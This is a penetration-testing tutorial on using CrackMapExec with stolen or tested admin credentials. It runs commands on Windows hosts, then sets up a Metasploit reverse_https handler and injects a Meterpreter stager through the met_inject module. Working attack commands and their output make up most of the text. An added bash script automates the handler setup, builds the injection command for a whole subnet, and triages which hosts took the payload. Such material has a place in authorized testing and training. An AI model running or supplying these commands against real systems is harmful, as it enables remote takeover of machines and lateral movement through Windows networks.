CrackMapExec - Meterpreter shell


This article was written by Jeff Warren

Getting a Meterpreter shell with CrackMapExec

CrackMapExec (CME) is a swiss army knife for pentesting Windows/Active Directory environments. Active Directory (AD) is the directory service Microsoft developed for Windows domain networks; it ships with most Windows Server editions as a set of processes and services.

Testing creds

We've got some creds we want to check against a target, so let's run a couple of commands to get a whoami and some PowerShell information. CME takes the target (an IP, a hostname or a CIDR range) before the flags; `<target>` below is a placeholder for it. The -x flag runs a command through cmd.exe:

crackmapexec <target> -u Administrator -p 'P@ssw0rd' -x whoami

You can also execute PowerShell commands directly using the -X flag. The (Pwn3d!) tag in the output means the credentials have local administrator rights on that host, which is what both command execution and the payload injection below require:

#~ crackmapexec <target> -u Administrator -p 'P@ssw0rd' -X '$PSVersionTable'
06-05-2016 14:36:06 CME WIN7BOX         [*] Windows 6.1 Build 7601 (name:WIN7BOX) (domain:LAB)
06-05-2016 14:36:06 CME WIN7BOX         [+] LAB\Administrator:P@ssw0rd (Pwn3d!)
06-05-2016 14:36:10 CME WIN7BOX         [+] Executed command 
06-05-2016 14:36:10 CME WIN7BOX         Name                           Value
06-05-2016 14:36:10 CME WIN7BOX         ----                           -----
06-05-2016 14:36:10 CME WIN7BOX         CLRVersion                     2.0.50727.5420
06-05-2016 14:36:10 CME WIN7BOX         BuildVersion                   6.1.7601.17514
06-05-2016 14:36:10 CME WIN7BOX         PSVersion                      2.0
06-05-2016 14:36:10 CME WIN7BOX         WSManStackVersion              2.0
06-05-2016 14:36:10 CME WIN7BOX         PSCompatibleVersions           {1.0, 2.0}
06-05-2016 14:36:10 CME WIN7BOX         SerializationVersion 
06-05-2016 14:36:10 CME WIN7BOX         PSRemotingProtocolVersion      2.1
06-05-2016 14:36:10 [*] KTHXBYE!

Setting Up Metasploit Handler

Now for the Meterpreter shell. Start Metasploit with msfconsole in a new terminal and set up the reverse handler. The payload type and port you choose here must match the LHOST/LPORT you pass to met_inject in the next step; exploit -j starts the handler as a background job so you keep the console.

use exploit/multi/handler
set payload windows/meterpreter/reverse_https
set lhost
set lport 444
exploit -j

Using the met_inject module to get a shell

Now, using the met_inject module, we can get a Meterpreter shell. The module injects the Meterpreter stager into a process on the target with PowerShell: the "GET /Invoke-Shellcode.ps1" line in the output is the target fetching the injection script from CME's built-in web server, so LHOST must be reachable from the target, not just from the handler. The command itself is run over smbexec, which executes commands by creating and starting a service on the host; that leaves a service-installation event (System log, event ID 7045) behind, so expect it to be noisy on a monitored network.

sudo cme <target> -u 'Administrator' -p 'P@ssw0rd' -M met_inject -o LHOST= LPORT=444
CME MEETINGROOM     [*] Windows 6.3 Build 9600 (name:MEETINGROOM) (domain:SE)
CME MEETINGROOM     [+] MEETINGROOM\Administrator:PASS (Pwn3d!)
METINJECT MEETINGROOM     [+] Executed payload
METINJECT                                      [*] Waiting on 1 host(s)
METINJECT                   [*] - - "GET /Invoke-Shellcode.ps1 HTTP/1.1" 200 -
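The handler and the module have to agree on LHOST, LPORT and the payload type, and with a range of targets you want the handler to keep listening and a quick way to see which hosts actually took the payload. The following script is an added example, not code from the original article or from CrackMapExec itself: it generates the handler as an msfconsole resource file from one LHOST/LPORT pair, builds the matching met_inject command line, and triages CME output for hosts that were local admin and hosts that reported "Executed payload". TARGET, LHOST and the sample log lines are placeholders and constructed data, not values from the page.

```shell
#!/usr/bin/env bash
# Added example, not code from the original article or from CrackMapExec itself.
# It ties the Metasploit handler and the met_inject options to one LHOST/LPORT
# pair so they cannot drift, and triages CME's output to see which hosts were
# local admin ("Pwn3d!") and which actually took the payload.
# Placeholders (assumptions, not values from the page): TARGET, LHOST.

# Write an msfconsole resource file for the handler. ExitOnSession false plus
# exploit -j -z keeps the handler up for every host in a range instead of
# exiting after the first session.
write_handler_rc() {
    local lhost="$1" lport="$2" out="$3"
    if [ -z "$lhost" ]; then
        echo "LHOST is required" >&2
        return 1
    fi
    case "$lport" in
        ''|*[!0-9]*) echo "LPORT must be numeric" >&2; return 1 ;;
    esac
    if [ "$lport" -lt 1 ] || [ "$lport" -gt 65535 ]; then
        echo "LPORT out of range" >&2
        return 1
    fi
    cat > "$out" <<EOF
use exploit/multi/handler
set payload windows/meterpreter/reverse_https
set LHOST $lhost
set LPORT $lport
set ExitOnSession false
exploit -j -z
EOF
}

# Build the met_inject command line from the same LHOST/LPORT as the handler.
# The target (IP, hostname or CIDR range) goes before the flags.
cme_met_inject_cmd() {
    local target="$1" user="$2" pass="$3" lhost="$4" lport="$5"
    printf "cme %s -u '%s' -p '%s' -M met_inject -o LHOST=%s LPORT=%s\n" \
        "$target" "$user" "$pass" "$lhost" "$lport"
}

# Triage CME output read from stdin. The host name is the field after the
# "CME" / "METINJECT" tag; a host is listed only if the creds were local admin,
# and flagged payload-executed if met_inject reported "Executed payload".
triage_cme_log() {
    awk '{
        host = ""
        for (i = 1; i < NF; i++)
            if ($i == "CME" || $i == "METINJECT") { host = $(i + 1); break }
        if (host == "") next
        if ($0 ~ /\(Pwn3d!\)/) admin[host] = 1
        if ($0 ~ /Executed payload/) payload[host] = 1
    }
    END {
        for (h in admin) {
            status = (h in payload) ? "payload-executed" : "admin-only"
            print h, status
        }
    }' | LC_ALL=C sort
}

# Constructed sample output, modelled on the article's transcript (not a real
# capture): one host took the payload, one was admin but the injection failed,
# one only had valid non-admin creds.
SAMPLE_LOG='CME MEETINGROOM     [*] Windows 6.3 Build 9600 (name:MEETINGROOM) (domain:SE)
CME MEETINGROOM     [+] SE\Administrator:P@ssw0rd (Pwn3d!)
METINJECT MEETINGROOM     [+] Executed payload
CME FILESRV         [*] Windows 6.3 Build 9600 (name:FILESRV) (domain:SE)
CME FILESRV         [+] SE\Administrator:P@ssw0rd (Pwn3d!)
METINJECT FILESRV         [-] Failed to execute payload
CME WKS01           [+] SE\jdoe:Summer2016
METINJECT                                      [*] Waiting on 2 host(s)'

# Demo run with placeholder values.
rc_file=$(mktemp)
write_handler_rc "${LHOST:-10.0.0.5}" "${LPORT:-444}" "$rc_file"
echo "handler resource file ($rc_file); start it with: msfconsole -q -r $rc_file"
cat "$rc_file"
cme_met_inject_cmd "${TARGET:-192.168.1.0/24}" Administrator 'P@ssw0rd' "${LHOST:-10.0.0.5}" "${LPORT:-444}"
printf '%s\n' "$SAMPLE_LOG" | triage_cme_log
```

Start the handler with the generated resource file first, then run the printed cme command; pipe the CME output through triage_cme_log (or save it with tee and feed the file in) to get one line per admin host telling you whether the payload ran. Hosts with valid but non-admin creds are deliberately left out, since met_inject cannot do anything with them.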

